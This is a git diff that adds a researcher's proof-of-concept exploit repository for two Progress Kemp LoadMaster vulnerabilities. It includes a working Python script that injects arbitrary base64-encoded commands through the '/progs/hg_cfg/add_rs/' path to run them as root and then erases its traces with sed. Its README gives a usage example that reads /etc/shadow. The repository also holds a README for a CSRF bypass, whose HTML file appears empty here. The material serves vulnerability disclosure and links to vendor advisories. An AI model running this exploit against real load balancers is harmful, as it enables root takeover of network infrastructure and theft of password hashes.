diff --git a/CVE-2024-2448/CVE-2024-2448.py b/CVE-2024-2448/CVE-2024-2448.py new file mode 100644 index 0000000..b4cd8be --- /dev/null +++ b/CVE-2024-2448/CVE-2024-2448.py @@ -0,0 +1,60 @@ +# Exploit for CVE-2024-2448: authenticated command injection in Progress Kemp LoadMaster +# Tested on: LoadMaster 7.2.59.2 +# Author: Dave Yesland @daveysec with Rhino Security Labs + +import argparse +import base64 +import requests +import urllib3 +from urllib3.exceptions import InsecureRequestWarning + +# Suppress only the InsecureRequestWarning from urllib3 +urllib3.disable_warnings(InsecureRequestWarning) + + +def get_headers(host, sessionid): + return { + 'Cookie': f'SESSIONID={sessionid}', + 'Referer': f'{host}/progs/' + } + + +def cleanup(cookie, host): + cleanup_cmd = 'sed -i "s/.*blahblah.*//g" /tmp/rrd/hist_graphs.env' + cleanup_cmd = f"$({cleanup_cmd})" + encoded_cmd = base64.b64encode(cleanup_cmd.encode()).decode() + url = f"{host}/progs/hg_cfg/add_rs/{encoded_cmd}" + requests.get(url, headers=get_headers(host, cookie), verify=False) + + +def exec_command(cmd, cookie, host): + cmd = f"$({cmd} 1>&2)" + encoded_cmd = base64.b64encode(cmd.encode()).decode() + url = f"{host}/progs/hg_cfg/add_rs/{encoded_cmd}" + response = requests.get(url, headers=get_headers(host, cookie), verify=False, proxies={"https":"http://192.168.0.11:8080"}) + print(get_cmd_output(response.text)) + cleanup(cookie, host) + + +def get_cmd_output(html_content): + start_tag = '
' + end_tag = '
' + start_index = html_content.find(start_tag) + len(start_tag) + end_index = html_content.find(end_tag, start_index) + extracted_content = html_content[start_index:end_index].strip() + return extracted_content + + +def main(): + parser = argparse.ArgumentParser() + parser.add_argument('--url', type=str, help='https://HOST:PORT', required=True) + parser.add_argument('--cookie', type=str, help='Session cookie', required=True) + parser.add_argument('--cmd', type=str, help='Command to execute', required=True) + + args = parser.parse_args() + + exec_command(args.cmd, args.cookie, args.url) + + +if __name__ == "__main__": + main() diff --git a/CVE-2024-2448/README.md b/CVE-2024-2448/README.md new file mode 100644 index 0000000..846d5bb --- /dev/null +++ b/CVE-2024-2448/README.md @@ -0,0 +1,21 @@ +# CVE-2024-2448: Authenticated Command Injection in Progress Kemp LoadMaster + +## Information +**Description:** This allows authenticated command execution as root on LoadMaster load balancers. +**Versions Affected:** LoadMaster 7.2.59.2 +**Version Fixed:** See Vendor Advisory +**Researcher:** Dav Yesland (https://twitter.com/daveysec) +**Disclosure Link:** https://rhinosecuritylabs.com/research/cve-2024-2448-kemp-loadmaster/ +**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2024-2448 +**Vendor Advisory:** https://support.kemptechnologies.com/hc/en-us/articles/25119767150477-LoadMaster-Security-Vulnerabilities-CVE-2024-2448-and-CVE-2024-2449 +## Proof-of-Concept Exploit +### Description +This exploits an authenticated (with any permission settings) command injection in LoadMaster where user input is executed by an eval statement. + +### Usage/Exploitation +``` +python3 CVE-2024-2448.py --url 'https://LM_HOST:8443' --cookie 'AUTH_COOKIE' --cmd 'cat /etc/shadow' +``` + +### Screenshot +![Alt-text that shows up on hover](poc_image.png) \ No newline at end of file diff --git a/CVE-2024-2448/poc_image.png b/CVE-2024-2448/poc_image.png new file mode 100644 index 0000000..df302a9 Binary files /dev/null and b/CVE-2024-2448/poc_image.png differ diff --git a/CVE-2024-2449/README.md b/CVE-2024-2449/README.md new file mode 100644 index 0000000..8c807fc --- /dev/null +++ b/CVE-2024-2449/README.md @@ -0,0 +1,20 @@ +# CVE-2024-2449: Cross-Site Requets Forgery in Progress Kemp LoadMaster + +## Information +**Description:** This demonstrates a bypass in the CSRF protections of the Progress Kemp LoadMaster WUI. +**Versions Affected:** 7.2.59.2 +**Version Fixed:** See vendor advisory. +**Researcher:** Dave Yesland (https://twitter.com/daveysec) +**Disclosure Link:** https://rhinosecuritylabs.com/research/cve-2024-2448-kemp-loadmaster/ +**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2024-2449 +**Vendor Disclosure** https://support.kemptechnologies.com/hc/en-us/articles/25119767150477-LoadMaster-Security-Vulnerabilities-CVE-2024-2448-and-CVE-2024-2449 + +## Proof-of-Concept Exploit +### Description +This bypasses CSRF protections by serving the HTML file from the same directory as the targeted WUI page and including the referer. This bypasses the regex checks of the Referer header. + +### Usage/Exploitation +Serve the HTML file from the `/progs/hg_cfg` directory. + +### Screenshot +![Alt-text that shows up on hover](poc_image.gif) \ No newline at end of file diff --git a/CVE-2024-2449/poc_image.gif b/CVE-2024-2449/poc_image.gif new file mode 100644 index 0000000..55b7c86 Binary files /dev/null and b/CVE-2024-2449/poc_image.gif differ diff --git a/CVE-2024-2449/progs/hg_cfg/CVE-2024-2449.html b/CVE-2024-2449/progs/hg_cfg/CVE-2024-2449.html new file mode 100644 index 0000000..30b6066 --- /dev/null +++ b/CVE-2024-2449/progs/hg_cfg/CVE-2024-2449.html @@ -0,0 +1,30 @@ + + + + + + + +
+
+ + + + + \ No newline at end of file